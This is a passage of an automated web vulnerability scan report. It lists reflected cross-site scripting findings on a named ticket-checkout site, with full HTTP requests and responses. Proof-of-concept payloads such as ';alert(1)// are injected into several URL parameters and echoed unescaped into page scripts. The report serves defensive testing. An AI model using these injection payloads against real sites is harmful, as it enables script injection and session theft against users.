...[SNIP]...
<![CDATA[
PageUet.initialize('seats-uet', '-776896836:7925:pgscheckout','','bing',{tag:'mt:int;sz:1254;id:38966936984';alert(1)//221666173fb'})
//]]>
...[SNIP]...

4.93. http://bing.fansnap.com/checkout/index/418563179 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bing.fansnap.com
Path:   /checkout/index/418563179

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f2db3(a)9cb2e294b58 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkout/index/418563179f2db3(a)9cb2e294b58?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4AzAqqNBjoLb2Zmc2V0af6QnQ%3D%3D--a2496e9fd1e9391aea4b68370610eb89644e9f7c

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:39:05 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 431
ETag: "ddbd0939a8f97e966f5ed29101cf1ee7"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: bg_lvd=1311100745; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:39:05 GMT
Set-Cookie: _fancat_session=BAh7DjoPc2Vzc2lvbl9pZCIlZWFlMTRmYjAzZDgwZGJlOGUyNzE3N2NjY2E0MzZmNzY6Emxhc3RfYWNjZXNzZWRJdToJVGltZQ1y2huA%2BfJenAY6C29mZnNldGn%2BkJ06DmJnX3NyY19pZGkB%2FzoKYmdfbHBJIgH%2FaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE4NTYzMTc5ZjJkYjMoYSk5Y2IyZTI5NGI1OD9jdHg9YyUzRHRpeCUzQm10JTNEaW50JTNCdHNwJTNEMCUzQmR0JTNEMSUzQmxwb3MlM0QyJmNoPWJpbmcmcXVhbnRpdHk9MiZscD10cnVlJnBvY3R4PXJhbmslM0QzNiUzQmNyYXdsU2NvcmUlM0RudWxsJTNCcG9wMSUzRDAuMDM3NCUzQnBvcDIlM0QwLjAzNzQlM0Jwb3AzJTNEMC4wMzc0JTNCJmFmbT0mdWV0PS03NzY4OTY4MzYlBjoGRUY6D2JnX3JlZmVyZXIiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWw6EGJnX3Zpc2l0X2lkaQRZDd8sOhJiZ192aXNpdG9yX2lkIhUxMzQyNTY2ODMwMjc1NTg1OhFiZ19zdHlsZV9pZHNJIgAGOwtGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQA8%3D--28b7dc6c02fdee7f14139160626eb064ce53160c; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11911
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
<![CDATA[
CheckoutInterstitialController.initialize({fbConnect: false, skipPingout: false, ticketSetId: 418563179f2db3(a)9cb2e294b58, quantity: 2, ctx: escape('c=tix;mt=int;tsp=0;dt=1;lpos=2'), fakeResult: 'none', salePrice: 62.0, roundedPrice: 62, split: ["2"], requestQty: false, channel: 'bing', poctx: 'rank=36;crawlScore=null;po
...[SNIP]...

4.94. http://bing.fansnap.com/checkout/index/418563179 [afm parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bing.fansnap.com
Path:   /checkout/index/418563179

Issue detail

The value of the afm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 668a1'%3balert(1)//1b8fecb7052 was submitted in the afm parameter. This input was echoed as 668a1';alert(1)//1b8fecb7052 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=668a1'%3balert(1)//1b8fecb7052&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4AzAqqNBjoLb2Zmc2V0af6QnQ%3D%3D--a2496e9fd1e9391aea4b68370610eb89644e9f7c

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 17
ETag: "fb0f0d4f666b939a2a1e7cd630b2251a"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DRAQ6RBjoLb2Zmc2V0af6QnQ%3D%3D--bbd810f4a8f6aee49782e0c1df5f080b5dc003d9; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 12033
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
p=0;dt=1;lpos=2'), fakeResult: 'none', salePrice: 62.0, roundedPrice: 62, split: ["2"], requestQty: false, channel: 'bing', poctx: 'rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;', afm: '668a1';alert(1)//1b8fecb7052' });
//]]>
...[SNIP]...

4.95. http://bing.fansnap.com/checkout/index/418563179 [ch parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bing.fansnap.com
Path:   /checkout/index/418563179

Issue detail

The value of the ch request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7bcdf'%3balert(1)//2713641b124 was submitted in the ch parameter. This input was echoed as 7bcdf';alert(1)//2713641b124 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing7bcdf'%3balert(1)//2713641b124&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4AzAqqNBjoLb2Zmc2V0af6QnQ%3D%3D--a2496e9fd1e9391aea4b68370610eb89644e9f7c

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 149
ETag: "789a7c9e1c5ee7b5c72b070ff4253e4d"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: ver=1; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:35:53 GMT
Set-Cookie: tvid=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: vid=; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:35:53 GMT
Set-Cookie: lvd=1311100553; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:35:53 GMT
Set-Cookie: _fancat_session=BAh7GDoPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4BULFuPBjoLb2Zmc2V0af6QnToLc3JjX2lkaQH%2FOgdscEkiAf9odHRwOi8vYmluZy5mYW5zbmFwLmNvbS9jaGVja291dC9pbmRleC80MTg1NjMxNzk%2FY3R4PWMlM0R0aXglM0JtdCUzRGludCUzQnRzcCUzRDAlM0JkdCUzRDElM0JscG9zJTNEMiZjaD1iaW5nN2JjZGYnJTNiYWxlcnQoMSkvLzI3MTM2NDFiMTI0JnF1YW50aXR5PTImbHA9dHJ1ZSZwb2N0eD1yYW5rJTNEMzYlM0JjcmF3bFNjb3JlJTNEbnVsbCUzQnBvcDElM0QwLjAzNzQlM0Jwb3AyJTNEMC4wMzc0JTNCcG9wMyUzRDAuMDM3NCUzQiZhZm09JnVldD0GOwdGOgxyZWZlcmVyIgGZaHR0cDovL2JpbmcuZmFuc25hcC5jb20vdTItdGlja2V0cy91Mi13aXRoLWludGVycG9sLXJlc2NoZWR1bGVkLWZyb20tNzE5L2p1bHktMjAtMjAxMS0zODk2Njk%2FdXRtX3NvdXJjZT0xOTg3JmFjaz1odHRwJTNhJTJmJTJmd3d3LmJpbmcuY29tJTJmcyUyZmFjay5odG1sOg12aXNpdF9pZGkE0EauNzoPdmlzaXRvcl9pZCIAOg5zdHlsZV9pZHNJIgAGOwdGOghsb2N7CjsQZhozMi43ODI0OTk5OTk5OTk5OTkAj1w7EWYbLTk2LjgyMDcwMDAwMDAwMDAwMgD08TsSaRI7EyIWRGFsbGFzLUZvcnQgV29ydGg7FEAa--ee1ba1006b679a9f3b53a6d54e24fc3cd43317f6; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 12049
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
ingout: false, ticketSetId: 418563179, quantity: 2, ctx: escape('c=tix;mt=int;tsp=0;dt=1;lpos=2'), fakeResult: 'none', salePrice: 62.0, roundedPrice: 62, split: ["2"], requestQty: false, channel: 'bing7bcdf';alert(1)//2713641b124', poctx: 'rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;', afm: '' });
//]]>
...[SNIP]...

4.96. http://bing.fansnap.com/checkout/index/418563179 [ctx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bing.fansnap.com
Path:   /checkout/index/418563179

Issue detail

The value of the ctx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b263b'%3balert(1)//2660bb145a6 was submitted in the ctx parameter. This input was echoed as b263b';alert(1)//2660bb145a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2b263b'%3balert(1)//2660bb145a6&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4AzAqqNBjoLb2Zmc2V0af6QnQ%3D%3D--a2496e9fd1e9391aea4b68370610eb89644e9f7c

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 17
ETag: "585bbfb8bfee5437fab870e41f0b9469"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4BtKQOPBjoLb2Zmc2V0af6QnQ%3D%3D--2ecf5b7e4e9f630a03eece5d12b58bfb3cee9828; domain=fansnap.com; path=/; HttpOnly
